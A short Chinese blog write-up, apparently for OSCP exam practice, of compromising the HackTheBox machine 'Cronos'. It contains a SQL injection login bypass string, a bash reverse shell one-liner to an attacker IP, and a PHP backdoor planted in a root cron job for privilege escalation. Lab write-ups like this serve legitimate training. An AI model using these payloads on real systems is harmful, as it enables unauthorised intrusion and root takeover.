OSCP备考_0x04_HackThBox靶机_Linux_cronos

Ethan医生4个月前 (06-26)靶场165

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)

nmap -sU --top-ports 100 10.129.184.136 (扫描UDP)

看到80端口直接冲过去，发现了经典Apache2页面，然后进行dirb，dirbuster各种目录扫描，居然没有收获。

dig +short -x 10.129.184.136 @10.129.184.136

dig axfr cronos.htb @10.129.184.136

登入存在账号:admin' or 1=1# SQL漏洞

发现代码执行

直接使用反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.16.31/3333 0>&1'

开始操作提权

cat /etc/crontab

artisan有修改执行权限,那就再里面插入代码

直接删除挡案后上传本地的后门文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.31/3334 0>&1'"); ?>

反弹后直接拿到ROOT

标签: OSCP

返回列表

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口，发现是一个集成工具...

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

EthanDoctor